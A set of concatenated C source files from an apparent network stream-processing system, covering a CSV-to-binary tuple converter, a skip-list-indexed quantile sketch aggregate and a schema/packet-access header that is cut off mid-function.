/* CSV-to-GDAT converter.  Reads a schema file, then converts each CSV
 * input line into a binary GDAT tuple (network-byte-order length prefix
 * followed by the tuple body) written to the output file.
 * Usage: prog [-v|-x] <schema_file> <input_file|-|stdin> <output_file>
 * Fixes: feof()-before-fgets() processed the final line twice; "%ldu"
 * never parsed a signed long long; "%f" under-filled the double-width
 * gs_float_t; %lu was fed a gs_uint32_t; the positional-argument check
 * accepted fewer than the three required names; blank/short lines could
 * pass NULL to sscanf; removed the unused `rsize` local. */
int main(int argc, char** argv) {
	gs_schemahandle_t schema;
	gs_int8_t rbuf[2*MAXTUPLESZ];	/* one CSV input line */
	gs_int8_t wbuf[2*MAXTUPLESZ];	/* binary tuple under construction */
	gs_int32_t numberoffields;
	gs_int32_t verbose=0;
	gs_int32_t y;
	gs_int32_t parserversion;
	gs_uint32_t schemalen;
	gs_sp_t me;
	gs_int32_t ch;

	me=argv[0];
	if (argc<2) {
		fprintf(stderr,
			"%s::usage: %s -v -x <schema_file_name> <input_file_name> <output_file_name>\n",
			me,me);
		exit(1);
	}
	while ((ch = getopt(argc, argv, "vx")) != -1) {
		switch(ch) {
		case 'v':
			verbose=1;
			break;
		case 'x':
			verbose=2;
		}
	}
	argc -= optind;
	/* All three positional names (schema, input, output) are consumed
	 * below, so require all three instead of just one. */
	if (argc < 3) {
		fprintf(stderr,"%s::usage: %s -v -x <schema_file_name> <input_file_name> <output_file_name>\n",
			me,me);
		exit(1);
	}
	argv += optind;
	if ((sfd=fopen(argv[0],"r"))==0) {
		fprintf(stderr,"%s::error:could not open schema file %s\n",
			me,argv[0]);
		exit(1);
	}
	schemalen = fread(schema_buf, 1, MAX_GDAT_HEADER, sfd);
	schema_buf[schemalen] = 0;
	schema = ftaschema_parse_string_prot(schema_buf);
	if (schema < 0) {
		fprintf(stderr,"%s::error:unable to parse schema file %s\n",
			me,argv[0]);
		exit(1);
	}
	fclose(sfd);
	argv++;
	if ((strcmp(argv[0],"-")!=0)&&(strcmp(argv[0],"stdin")!=0)) {
		if ((ifd=fopen(argv[0],"r"))==0) {
			fprintf(stderr,"%s::error:could not open input file %s\n",
				me,argv[0]);
			exit(1);
		}
	} else {
		ifd = stdin;
	}
	argv++;
	if ((ofd=fopen(argv[0],"wb"))==0) {
		fprintf(stderr,"%s::error:could not open output file %s\n",
			me,argv[0]);
		exit(1);
	}

	parserversion = get_schemaparser_version();
	/* Write the GDAT header, then the ASCII schema text.  The cast keeps
	 * the argument matched to %lu on LP64 platforms, where gs_uint32_t
	 * is plain unsigned int. */
	sprintf(header_buf,"GDAT\nVERSION:%u\nSCHEMALENGTH:%lu\n",
		parserversion,(unsigned long)(schemalen+1));
	fwrite(header_buf,strlen(header_buf),1,ofd);
	fwrite(schema_buf,schemalen+1,1,ofd);

	if ((numberoffields=ftaschema_tuple_len(schema))<0) {
		fprintf(stderr,"%s::error:could not get number of fields in schema\n",
			me);
		exit(1);
	}
	if (verbose==1) {
		/* Print the column header line. */
		for(y=0; y<numberoffields;y++) {
			printf("%s",ftaschema_field_name(schema,y));
			if (y<numberoffields-1) printf("|");
		}
		printf("\n");
	}
	unsigned long long tup_cnt = 0;
	/* Convert one CSV line per tuple.  Testing fgets() directly (instead
	 * of feof() before reading) prevents re-processing the final line at
	 * end of file. */
	while (fgets(rbuf,2*MAXTUPLESZ,ifd) != NULL) {
		gs_uint32_t tuple_pos = ftaschema_get_tuple_metadata_offset(schema) + 1; /* position to copy string payload */
		char* field = strtok(rbuf, ",");
		if (field == NULL)	/* ignore blank lines */
			continue;
		y = 0;
		do {
			gs_int32_t field_type = ftaschema_get_field_type_by_index(schema, y);
			gs_int32_t field_offset = ftaschema_get_field_offset_by_index(schema, y);
			gs_int32_t i;
			gs_uint32_t ui;
			gs_uint64_t ul;
			gs_int64_t l;
			gs_float_t f,intpart,fractpart;
			struct timeval t;
			struct vstring32 vs;
			struct hfta_ipv6_str ip6;
			gs_uint32_t v[8];
			unsigned ip1,ip2,ip3,ip4;
			switch (field_type) {
			case BOOL_TYPE:
				ui=(strncasecmp("TRUE",field,4)==0);
				memcpy(wbuf+field_offset,&ui,sizeof(ui));
				break;
			case INT_TYPE:
				sscanf(field,"%d",&i);
				memcpy(wbuf+field_offset,&i,sizeof(i));
				break;
			case UINT_TYPE:
			case USHORT_TYPE:
				sscanf(field,"%u",&ui);
				memcpy(wbuf+field_offset,&ui,sizeof(ui));
				break;
			case ULLONG_TYPE:
				sscanf(field,"%llu",&ul);
				memcpy(wbuf+field_offset,&ul,sizeof(ul));
				break;
			case LLONG_TYPE:
				/* Was "%ldu", which stopped after a long and never
				 * matched the trailing 'u'; signed 64-bit needs %lld. */
				sscanf(field,"%lld",&l);
				memcpy(wbuf+field_offset,&l,sizeof(l));
				break;
			case FLOAT_TYPE:
				/* gs_float_t is double-width (see the %lf used for
				 * TIMEVAL below), so %f would fill only half of it. */
				sscanf(field,"%lf",&f);
				memcpy(wbuf+field_offset,&f,sizeof(f));
				break;
			case VSTR_TYPE:
			{
				/* A lone blank stands for the empty string. */
				if (!strcmp(field, " "))
					field[0] = 0;
				vs.length = strlen(field);
				vs.offset = tuple_pos;
				vs.reserved = 0;
				memcpy(wbuf+vs.offset, field, vs.length);
				memcpy(wbuf+field_offset,&vs,sizeof(vs));
				tuple_pos += vs.length;
			}
				break;
			case IP_TYPE:
				sscanf(field,"%u.%u.%u.%u",&ip1,&ip2,&ip3,&ip4);
				ui=(ip1<<24)|(ip2<<16)|(ip3<<8)|ip4;
				memcpy(wbuf+field_offset,&ui,sizeof(ui));
				break;
			case IPV6_TYPE:
				sscanf(field,"%x:%x:%x:%x:%x:%x:%x:%x",&v[0],&v[1],&v[2],&v[3],&v[4],&v[5],&v[6],&v[7]);
				ip6.v[0]=htonl(v[0]<<16|v[1]);
				ip6.v[1]=htonl(v[2]<<16|v[3]);
				ip6.v[2]=htonl(v[4]<<16|v[5]);
				ip6.v[3]=htonl(v[6]<<16|v[7]);
				memcpy(wbuf+field_offset,&ip6,sizeof(ip6));
				break;
			case TIMEVAL_TYPE:
				sscanf(field,"%lf sec",&f);
				fractpart=modf(f,&intpart);
				t.tv_sec = intpart;
				t.tv_usec = fractpart * 1000000;
				memcpy(wbuf+field_offset,&t,sizeof(t));
				break;
			default:
				break;
			}
			y++;
			field = strtok(NULL, ",");
			/* Stop early on short lines so NULL is never handed to sscanf. */
		} while (y < numberoffields && field != NULL);
		/* Emit the tuple: network-order length prefix, then the body. */
		gs_uint32_t tup_len = htonl(tuple_pos);
		fwrite(&tup_len,sizeof(gs_uint32_t),1,ofd);
		fwrite(wbuf,tuple_pos,1,ofd);
		tup_cnt++;
		if (tup_cnt % 1000000 == 0)
			printf("dumped %llu tuples\n", tup_cnt);
	}
	fclose(ifd);
	fclose(ofd);
	if (verbose!=0) fflush(stdout);
	exit(0);
}
<file_sep>#ifndef _UDAF_COMMON_DEFINED_
#define _UDAF_COMMON_DEFINED_
// This include file contains definitions for UDAFS
// Which must be synchronized between the LFTA and HFTA layers
// for quantiles (flip_udaf)
#define QUANT_LFTA1_SIZE 729
#define QUANT_LFTA2_SIZE 181
#define QUANT_LFTA3_SIZE 50
#define QUANT_EPS 0.01
#define SKIPDIR_SIZE 100
#define SKIPDIR_HEIGHT_MAX 7
#endif
<file_sep>#include <stdio.h>
#include <limits.h>
#include <math.h>
#include "rts_udaf.h"
#include "gsconfig.h"
#include "gstypes.h"
/* Full size
#define QUANT_LFTA1_SIZE 729
#define QUANT_LFTA2_SIZE 181
#define QUANT_LFTA3_SIZE 100
*/
/* half size
*/
#define QUANT_LFTA1_SIZE 378
#define QUANT_LFTA2_SIZE 93
#define QUANT_LFTA3_SIZE 50
/* quarter size
#define QUANT_LFTA1_SIZE 202
#define QUANT_LFTA2_SIZE 49
#define QUANT_LFTA3_SIZE 25
*/
#define QUANT_EPS 0.01
#define SKIPDIR_SIZE 100
#define SKIPDIR_HEIGHT_MAX 7
#define max(a,b) ((a) > (b) ? (a) : (b))
#define COMPRESSED_XFER
/****************************************************************/
/* Data Structures */
/****************************************************************/
// One quantile sample.  Fields follow the Greenwald-Khanna-style
// summary used below: `gap` is the count of stream elements covered
// since the previous sample, `del` (delta) bounds the rank uncertainty
// of this sample.  `next` is an index into the containing array
// (0 acts as the NULL index), so the structure is position-independent.
typedef struct tuple_t {
	gs_uint32_t val;
	gs_uint32_t gap;
	gs_uint32_t del;
	gs_uint32_t next;
} tuple_t;
// For skip list
typedef gs_uint32_t val_type;
// One node of the skip-list directory; `next` and `down` are indices
// into skipdir_t.list (0 = NULL index).
typedef struct skipnode {
	val_type val;
	gs_uint32_t next;
	gs_uint32_t down;
} skipnode_t;
// Skip-list directory used to locate samples in O(log n).
typedef struct skipdir {
	gs_uint32_t height;	// height of tree
	gs_uint32_t freeptr;	// cursor space stack (head of the free list)
	gs_uint32_t headptr[SKIPDIR_HEIGHT_MAX+1];	// ptrs to levels
	skipnode_t list[SKIPDIR_SIZE+1];	// node pool; slot 0 unused (NULL)
} skipdir_t;
/****************************************************************/
// fstring(5+(QUANT_LFTA3_SIZE+1)*4 +
//		(2+lg(QUANT_LFTA3_SIZE)+(QUANT_LFTA3_SIZE+1)*3)*4)
// Whole aggregate state, laid out flat so it can be shipped between
// the LFTA and HFTA as a byte string (see the size comment above).
typedef struct quant_udaf_lfta3_struct_t {
	gs_uint32_t nelts;	// # stream elements
	gs_uint32_t freeptr;	// ptr to cursor stack
	gs_uint32_t usedptr;	// ptr to allocated memory (head of sample list)
	gs_uint32_t circptr;	// circulating ptr used for compression
	gs_uint32_t size;	// number of slots handed out by the allocator
	tuple_t t[QUANT_LFTA3_SIZE+1];	// samples + auxiliary info; slot 0 unused
	skipdir_t sd;	// directory for searching tuples
} quant_udaf_lfta3_struct_t;
/****************************************************************/
/* Skip List Functions */
/****************************************************************/
// Skip list cursor stack operations
// Pop one node index off the skip-directory free list.
// Returns 0 (the NULL index) when no free nodes remain.
gs_uint32_t skipdir_alloc(skipdir_t *sd)
{
	gs_uint32_t head = sd->freeptr;
	if (head != 0) {
		sd->freeptr = sd->list[head].next;
	}
	return head;
}
// Return node `ptr` to the free list, clearing its payload fields
// so stale links cannot be followed later.
void skipdir_free(skipdir_t *sd, gs_uint32_t ptr)
{
	skipnode_t *node = &sd->list[ptr];
	node->val = 0;
	node->down = 0;
	node->next = sd->freeptr;
	sd->freeptr = ptr;
}
// Initialize an empty skip directory: zero height, all level heads
// NULL, and all pool nodes (1..SKIPDIR_SIZE) chained on the free list.
// Fix: headptr is declared with SKIPDIR_HEIGHT_MAX+1 entries but the
// old loop initialized only the first SKIPDIR_HEIGHT_MAX, leaving the
// last slot uninitialized; initialize the whole array.
void skipdir_create(skipdir_t *sd)
{
	gs_int32_t i;
	sd->height = 0;
	sd->freeptr = 1;
	for (i=0; i <= SKIPDIR_HEIGHT_MAX; i++)
		sd->headptr[i] = 0;
	// chain the node pool into the free list; slot 0 is the NULL index
	for (i=1; i < SKIPDIR_SIZE; i++)
		sd->list[i].next = i+1;
	sd->list[SKIPDIR_SIZE].next = 0;
}
// Logically empty the directory by zeroing its height; searches then
// report an empty structure.  Note the free list and level heads are
// NOT rebuilt here — reuse after destroy presumably goes through
// skipdir_create (TODO confirm with callers).
void skipdir_destroy(skipdir_t *sd)
{
	sd->height = 0;
}
// Descend the skip directory looking for `val`, recording the search
// path.  On return, ptrstack[l+1] holds the strict predecessor of
// `val` at directory level l (0 if `val` would come first at that
// level), and ptrstack[0] holds the leaf pointer reached by following
// `down` from the lowest-level predecessor (0 if none).  Callers use
// this path for subsequent insert/delete at every level.
void skipdir_search(skipdir_t *sd, val_type val, gs_uint32_t *ptrstack)
{
	gs_uint32_t ptr;
	gs_int32_t l;
	// empty directory: no predecessors at any level
	if (sd->height == 0) {
		ptrstack[0] = ptrstack[1] = 0;
		return;
	}
	// search nonleaf nodes
	ptr = sd->headptr[sd->height-1];
	for (l=sd->height-1; l >= 0; l--) {
		if (ptr == 0) {
			// this level is empty from here on; restart from the
			// head of the level below
			ptrstack[l+1] = 0;
			ptr = (l > 0) ? sd->headptr[l-1] : 0;
		}
		else if (val <= sd->list[ptr].val) {
			// val precedes everything reachable at this level
			ptrstack[l+1] = 0;
			ptr = (l > 0) ? sd->headptr[l-1] : 0;
		}
		else {
			// advance along the level to the last node < val,
			// then drop down one level
			while ((sd->list[ptr].next != 0) &&
					(sd->list[sd->list[ptr].next].val < val))
				ptr = sd->list[ptr].next;
			ptrstack[l+1] = ptr;
			ptr = sd->list[ptr].down;
		}
	}
	ptrstack[0] = ptr;
}
// Insert a directory entry for the leaf tuple `leafptr` with key
// `val`, using the search path recorded in `ptrstack` (from
// skipdir_search).  If a tower for `val` already exists, only its
// level-0 `down` pointer is redirected to the new leaf.  Otherwise a
// tower of geometrically-distributed height is built (coin flips via
// random()).
void skipdir_insert(skipdir_t *sd, gs_uint32_t *ptrstack,
		gs_uint32_t leafptr, val_type val)
{
	gs_uint32_t newptr, oldptr;
	gs_int32_t l;
	// if path already existed then point to new duplicate
	if ((ptrstack[1] == 0) && (sd->headptr[0] != 0)
			&& (sd->list[sd->headptr[0]].val == val)) {
		sd->list[sd->headptr[0]].down = leafptr;
		return;
	}
	if ((ptrstack[1] != 0) && (sd->list[ptrstack[1]].next != 0)
			&& (sd->list[sd->list[ptrstack[1]].next].val == val)) {
		sd->list[sd->list[ptrstack[1]].next].down = leafptr;
		return;
	}
	// grow a new tower bottom-up; stop on a tails flip, the height
	// cap, or pool exhaustion
	for (l=0; l < SKIPDIR_HEIGHT_MAX; l++) {
		if (random() % 2) break;
		newptr = skipdir_alloc(sd);
		if (!newptr) break;	// out of memory
		sd->list[newptr].val = val;
		//copy(&val, &list[newptr[l]].val);
		// link new directory node to level below
		if (l > 0)
			sd->list[newptr].down = oldptr;
		else
			sd->list[newptr].down = leafptr;
		// insert node into current level
		if ((l >= sd->height) || (ptrstack[l+1] == 0)) {
			// becomes the new head of this level
			sd->list[newptr].next = sd->headptr[l];
			sd->headptr[l] = newptr;
		}
		else {
			// splice in after the recorded predecessor
			sd->list[newptr].next = sd->list[ptrstack[l+1]].next;
			sd->list[ptrstack[l+1]].next = newptr;
		}
		oldptr = newptr;
	}
	// l is the number of levels actually built; raise height if needed
	if (l > sd->height) sd->height = l;
	//fprintf(stderr,"new height = %u\n",sd->height);
}
// Remove the tower for key `val` from every directory level, using
// the predecessors recorded in `ptrstack` (from skipdir_search for
// the same key).  At each level, the candidate successor is unlinked
// only if its key matches `val`; the scan stops at the first level
// where the tower is absent (towers are contiguous from level 0 up).
void skipdir_delete(skipdir_t *sd, gs_uint32_t *ptrstack, val_type val)
{
	gs_uint32_t delptr;
	gs_int32_t l;
	for (l=0; l < sd->height; l++) {
		if (ptrstack[l+1] == 0) {
			// no predecessor: the tower node, if present, is the head
			delptr = sd->headptr[l];
			if (delptr == 0) break;
			if (sd->list[delptr].val == val) {
				sd->headptr[l] = sd->list[delptr].next;
				skipdir_free(sd, delptr);
			}
			else
				break;
		}
		else {
			// unlink the node following the recorded predecessor
			delptr = sd->list[ptrstack[l+1]].next;
			if (delptr == 0) break;
			if (sd->list[delptr].val == val) {
				sd->list[ptrstack[l+1]].next = sd->list[delptr].next;
				skipdir_free(sd, delptr);
			}
			else
				break;
		}
	}
}
// For Debugging
// Debug helper: dump the directory to stderr, one line per level,
// top level first.  The first section prints each level's own keys;
// the second prints, for levels above 0, the keys of the nodes their
// `down` pointers lead to (a consistency aid).
void skipdir_print(skipdir_t *sd)
{
	gs_int32_t level;
	gs_uint32_t cur;
	for (level = sd->height - 1; level >= 0; level--) {
		for (cur = sd->headptr[level]; cur != 0; cur = sd->list[cur].next) {
			fprintf(stderr,"%u ", sd->list[cur].val);
		}
		fprintf(stderr,"\n");
	}
	fprintf(stderr,"-------\n");
	for (level = sd->height - 1; level > 0; level--) {
		for (cur = sd->headptr[level]; cur != 0; cur = sd->list[cur].next) {
			fprintf(stderr,"%u ", sd->list[sd->list[cur].down].val);
		}
		fprintf(stderr,"\n");
	}
	fprintf(stderr,"-------\n");
}
/*************************** Version 3 **************************/
/* Version 3: LFTA-medium */
/* */
/* NIC performs O(log n) operations at each update. */
/****************************************************************/
/****************************************************************/
/* Helper functions */
/****************************************************************/
// Pop a tuple slot off the aggregate's free list; returns 0 (NULL
// index) when the pool is exhausted.  Note: `size` is incremented
// unconditionally, mirroring the historical behavior even on failure.
gs_uint32_t quant_udaf_lfta3_cursor_alloc(quant_udaf_lfta3_struct_t *s)
{
	gs_uint32_t slot = s->freeptr;
	if (slot != 0) {
		s->freeptr = s->t[slot].next;
	}
	s->size++;
	return slot;
}
// Push tuple slot `ptr` back onto the aggregate's free list.
void quant_udaf_lfta3_cursor_free(quant_udaf_lfta3_struct_t *s, gs_uint32_t ptr)
{
	tuple_t *slot = &s->t[ptr];
	slot->next = s->freeptr;
	s->freeptr = ptr;
	s->size--;
}
// Debug helper: dump the sample list to stderr as (val, gap, del)
// triples in list order.
void quant_lfta3_print(quant_udaf_lfta3_struct_t *s)
{
	tuple_t *t = s->t;
	gs_uint32_t cur = s->usedptr;
	if (cur == 0) {
		fprintf(stderr,"<empty>\n");
		return;
	}
	//skipdir_print(&s->sd);
	while (cur != 0) {
		fprintf(stderr,"(%u, %u, %u) ",t[cur].val,t[cur].gap,t[cur].del);
		cur = t[cur].next;
	}
	fprintf(stderr,"\n");
}
// One step of incremental summary compression: advance a circulating
// cursor over the sample list and, if merging the next sample into its
// successor keeps the combined coverage below the error threshold
// (2 * eps * n, per the Greenwald-Khanna-style invariant), remove that
// sample from both the list and the skip directory.  Called once per
// update so the work is amortized O(1) per stream element.
void quant_lfta3_compress(quant_udaf_lfta3_struct_t *s)
{
	tuple_t *t = s->t;
	gs_uint32_t delptr;
	gs_uint32_t threshold;
	gs_uint32_t ptrstack[SKIPDIR_HEIGHT_MAX+5];
	threshold = (gs_uint32_t)ceil(2.0 * QUANT_EPS * (gs_float_t)s->nelts);
	//if(s->circptr < 0 || s->circptr >= QUANT_LFTA3_SIZE)
	//	printf("1) s->circptr = %d\n",s->circptr);
	//if(t[s->circptr].next < 0 || t[s->circptr].next >= QUANT_LFTA3_SIZE)
	//	printf("t[s->circptr].next = %d\n",t[s->circptr].next);
	// wrap the cursor to the list head when it reaches the tail (the
	// merge below needs a candidate and its successor to both exist)
	if ((s->circptr == 0) || (t[s->circptr].next == 0)
			|| (t[t[s->circptr].next].next == 0))
		s->circptr = s->usedptr;
	//if ((s->size % 10) != 0) return;
	if (s->nelts > 2) {
		//if(s->circptr < 0 || s->circptr >= QUANT_LFTA3_SIZE)
		//	printf("2) s->circptr = %d\n",s->circptr);
		// candidate for deletion: the node after the cursor
		delptr = t[s->circptr].next;
		//if(delptr < 0 || delptr >= QUANT_LFTA3_SIZE)
		//	printf("delptr = %d\n",delptr);
		//if(t[delptr].next < 0 || t[delptr].next >= QUANT_LFTA3_SIZE)
		//	printf("t[delptr].next = %d\n",t[delptr].next);
		// safe to merge only if the combined gap+delta stays under the
		// rank-error threshold
		if (t[delptr].gap+t[t[delptr].next].gap+t[t[delptr].next].del < threshold) {
			// delete from directory
			if (t[s->circptr].val != t[delptr].val) {
				// leftmost duplicate (if multiplicity)
				skipdir_search(&(s->sd), t[delptr].val, ptrstack);
				if (t[delptr].val == t[t[delptr].next].val) {
					//if(s->sd.headptr[0] < 0 || s->sd.headptr[0] >= QUANT_LFTA3_SIZE)
					//	printf("s->sd.headptr[0] = %d\n",s->sd.headptr[0]);
					// duplicates case: keep the tower, repoint its leaf
					// link at the surviving duplicate
					if ((ptrstack[1] == 0)
							&& (s->sd.headptr[0] != 0)
							&& (s->sd.list[s->sd.headptr[0]].val == t[delptr].val))
						s->sd.list[s->sd.headptr[0]].down = t[delptr].next;
					else if ((ptrstack[1] != 0)
							&& (s->sd.list[ptrstack[1]].next != 0)
							&& (s->sd.list[s->sd.list[ptrstack[1]].next].val == t[delptr].val))
						s->sd.list[s->sd.list[ptrstack[1]].next].down = t[delptr].next;
				}
				else {
					// non-duplicates case: remove the whole tower
					skipdir_delete(&(s->sd), ptrstack, t[delptr].val);
				}
			}
			// delete from list
			//fprintf(stderr,"DELETED %u\n", t[delptr].val);
			t[s->circptr].next = t[delptr].next;
			quant_udaf_lfta3_cursor_free(s, delptr);
		}
		else {
			// cannot merge here; advance the cursor
			s->circptr = t[s->circptr].next;
		}
	}
}
/****************************************************************/
/* LFTA3 functions */
/****************************************************************/
// Reset the quantile sketch stored in buffer `b`: no stream elements,
// an empty sample list, the full slot pool (1..QUANT_LFTA3_SIZE)
// chained on the free list, and a fresh (empty) skip directory.
void quant_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t b)
{
	quant_udaf_lfta3_struct_t *s = (quant_udaf_lfta3_struct_t *)b;
	gs_uint32_t slot;
	s->nelts = 0;
	s->size = 0;
	s->usedptr = 0;		// 0 acts as the NULL index
	s->circptr = 0;
	// rebuild the free list of tuple slots, starting at slot 1
	s->freeptr = 1;
	for (slot = 1; slot < QUANT_LFTA3_SIZE; slot++) {
		s->t[slot].next = slot + 1;
	}
	s->t[QUANT_LFTA3_SIZE].next = 0;
	skipdir_create(&(s->sd));
}
// Insert one stream value `v` into the sketch.  The structure appears
// to implement a Greenwald-Khanna-style epsilon-approximate quantile
// summary: a sorted sample list (by `val`) with per-sample gap/delta
// counters, indexed by a skip directory for O(log n) location, plus an
// amortized compression pass after each insert.
void quant_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v)
{
	quant_udaf_lfta3_struct_t *s = (quant_udaf_lfta3_struct_t *)b;
	tuple_t *t = s->t;
	gs_uint32_t ptr = s->usedptr;
	gs_uint32_t newptr, delptr;
	gs_uint32_t obj; // objective function
	gs_uint32_t threshold;
	gs_uint32_t ptrstack[SKIPDIR_HEIGHT_MAX+5];
	gs_uint32_t debugptr;
	//printf("AGGR_UPDATE start\n");
	s->nelts++;
	//fprintf(stderr,"nelts = %u\n",s->nelts);
	// left boundary case
	if ((ptr == 0) || (v < t[ptr].val)) {
		// NOTE(review): when ptr==0 (empty list) this compares against
		// t[0].val, the unused slot 0 — looks intentional only if slot 0
		// never matches a live value; confirm before changing.
		if (t[ptr].val == v) {
			// duplicate of the current minimum: just widen its count
			t[ptr].gap++;
			//printf("AGGR_UPDATE END 1\n");
			return;
		}
		// new minimum: prepend a fresh sample with delta 0
		newptr = quant_udaf_lfta3_cursor_alloc(s);
		if (newptr == 0) {
			gslog(LOG_ALERT, "Out of space.\n");
			return;
		}
		t[newptr].val = v;
		t[newptr].gap = 1;
		t[newptr].del = 0;
		t[newptr].next = s->usedptr;
		s->usedptr = newptr;
		//printf("AGGR_UPDATE END 2\n");
		return;
	}
	// locate $i$ such that (v_i-1 < v <= v_i)
	skipdir_search(&(s->sd), v, ptrstack);
	//ptr = (ptrstack[0] == 0) ? s->usedptr : s->sd.list[ptrstack[0]].down;
	ptr = (ptrstack[0] == 0) ? s->usedptr : ptrstack[0];
	// finish with a linear scan from the directory's leaf hint
	while ((t[ptr].next != 0) && (t[t[ptr].next].val < v))
		ptr = t[ptr].next;
	/*
	// duplicate value
	if ((t[ptr].next != 0) && (t[t[ptr].next].val == v)) {
		t[t[ptr].next].gap++;
		printf("AGGR_UPDATE END 3\n");
		return;
	}
	*/
	// right boundary case
	if (t[ptr].next == 0) {
		// new maximum: append a fresh sample with delta 0
		newptr = quant_udaf_lfta3_cursor_alloc(s);
		if (newptr == 0) {
			gslog(LOG_ALERT, "Out of space.\n");
			return;
		}
		t[newptr].val = v;
		t[newptr].gap = 1;
		t[newptr].del = 0;
		t[newptr].next = 0;
		t[ptr].next = newptr;
		//printf("AGGR_UPDATE END 4\n");
		return;
	}
	// non-boundary case
	//printf("1) t[ptr].next =%d, ptr=%d\n",t[ptr].next,ptr);
	// coverage of the successor bucket if we merged v into it
	obj = t[ptr].gap+t[t[ptr].next].gap+t[t[ptr].next].del;
	threshold = (gs_uint32_t)ceil(2.0 * QUANT_EPS * (gs_float_t)s->nelts);
	if (obj > threshold) {
		// successor bucket already full: insert a new sample before it,
		// inheriting the successor's rank uncertainty
		newptr = quant_udaf_lfta3_cursor_alloc(s);
		if (newptr == 0) {
			gslog(LOG_ALERT, "Out of memory.\n");
			return;
		}
		//printf("newptr=%d\n",newptr);
		t[newptr].val = v;
		t[newptr].gap = 1;
		t[newptr].del = t[t[ptr].next].gap+t[t[ptr].next].del - 1;
		t[newptr].next = t[ptr].next;
		t[ptr].next = newptr;
		skipdir_insert(&(s->sd), ptrstack, newptr, v);
	}
	else {
		// insert into existing bucket
		//printf("t[ptr].next =%d\n",t[ptr].next);
		t[t[ptr].next].gap++;
	}
	// amortized compression: try to merge one sample per update
	quant_lfta3_compress(s);
	//printf("AGGR_UPDATE END 5\n");
}
// Tell the runtime whether this aggregate must be flushed now:
// returns 1 when the slot pool is exhausted (free list empty), else 0.
gs_int32_t quant_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t b)
{
	quant_udaf_lfta3_struct_t *s = (quant_udaf_lfta3_struct_t *)b;
	return (s->freeptr == 0) ? 1 : 0;
}
// Serialize the sketch for transfer to the HFTA.  With COMPRESSED_XFER
// the sample list is compacted into contiguous slots 1..i (preserving
// order) and only the 5 scalar header words plus the occupied tuple
// entries (slots 0..i, 4 words each) are sent — the skip directory is
// rebuilt on the far side and not transmitted.  Without it, the whole
// struct is shipped verbatim.  `r` receives a pointer into `b` (no copy).
void quant_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *r, gs_sp_t b)
{
#ifdef COMPRESSED_XFER
	quant_udaf_lfta3_struct_t *s = (quant_udaf_lfta3_struct_t *)b;
	tuple_t tmp[QUANT_LFTA3_SIZE+1];
	gs_uint32_t ptr=s->usedptr;
	gs_int32_t i=0,j;
	// gather live samples in list order
	for (; ptr != 0; ptr=s->t[ptr].next) {
		tmp[i].val = s->t[ptr].val;
		tmp[i].gap = s->t[ptr].gap;
		tmp[i].del = s->t[ptr].del;
		i++;
	}
	// write them back densely at slots 1..i with sequential links
	for (j=1; j <= i; j++) {
		s->t[j].val = tmp[j-1].val;
		s->t[j].gap = tmp[j-1].gap;
		s->t[j].del = tmp[j-1].del;
		s->t[j].next = j+1;
	}
	s->t[i].next = 0;
	s->usedptr = 1;
	// 5 header words + 4 words per tuple entry (slots 0..i inclusive)
	r->length = (5 + 4*(i+1))*sizeof(gs_uint32_t);
#endif
#ifndef COMPRESSED_XFER
	r->length = sizeof(quant_udaf_lfta3_struct_t);
#endif
	r->data = b;
}
// Nothing to release: all state lives inline in the flat buffer `b`,
// which is owned by the runtime.
void quant_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t b)
{
	return;
}
<file_sep>#ifndef __SCHEMA_PROTOTYPES__
#define __SCHEMA_PROTOTYPES__
#ifdef __cplusplus
extern "C" {
#endif
/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#define PRECOMP
#include "gsconfig.h"
#include "gstypes.h"
#include "fta.h"
#include "rts_external.h"
#include "packet.h"
#include "md_stdlib.h"
#include "schemaparser.h"
// parser sanity checks
// #define PARSER_SANITY_CHECKS
// *** SAMPLING RELATED CONSTANTS
// ******************************
// Make sure the hash table sizes are powers of 2-1 since they are used to compute the module with an and.
// collions on the flow hash are handled properly so they are not that bad
#define MAX_FLOWRECORD_HASH 0x1fffff
// keep the collision rate low on denies
#define MAX_DENY_HASH 0x7fffff
// one out of SAMPLING_RATE+1 sampling
#define SAMPLING_RATE 19
// sampling probability
#define FLOWSAMPPROB (((gs_float_t)1)/((gs_float_t)SAMPLING_RATE+1))
// wait for SAMPLED_FLOW_TIMEOUT seconds idle time to time a flow out
#define SAMPLED_FLOW_TIMEOUT 30
// check if we haven't seen that flow in SAMPLED_FLOW_IDLE_TIME seconds to make sure we don't catch it in the midle
#define SAMPLED_FLOW_IDLE_TIME 30
// PACKET SAMPLING RATE one in SAMPLED_PACKETS will be sampled
#define SAMPLED_PACKETS 200
// SAMPLING probability
#define PACKETSAMPPROB (((gs_float_t)1)/((gs_float_t)SAMPLED_PACKETS))
// COMBINE probability
#define COMBINEDPROB (((gs_float_t)1)-(((gs_float_t)1)-FLOWSAMPPROB)*(((gs_float_t)1)-PACKETSAMPPROB))
/* General packet access functions */
// Return the packet's arrival timestamp (truncated to 32 bits).
// Always succeeds.
static inline gs_retval_t get_system_time(struct packet * p, gs_uint32_t * t)
{
	*t=(gs_uint32_t) p->systemTime;
	return 0;
}
// Return the schema identifier carried by the packet.  Always succeeds.
static inline gs_retval_t get_schemaId(struct packet * p, gs_uint32_t * t)
{
	*t=(gs_uint32_t) p->schema;
	return 0;
}
// fast unsigned integer parsing functions
// Parse an unsigned decimal integer from a non-NUL-terminated field of
// `len` digit characters (up to 10 digits; returns 0 for len==0 or
// len>10, matching the old switch's default case).
// Fix: the old unrolled switch computed each digit * 10^k product in
// signed int, which overflows (undefined behavior) for values above
// INT_MAX — e.g. "4294967295" or any 10-digit epoch after 2038 came
// back mangled.  Accumulate with Horner's method in unsigned long
// instead, which is exact for all 10-digit values.
static inline __attribute__((always_inline)) unsigned long gs_strtoul (const char *str, size_t len) {
	unsigned long value = 0;
	size_t i;
	if (len == 0 || len > 10)	// same bounds as the original switch
		return 0;
	for (i = 0; i < len; i++)
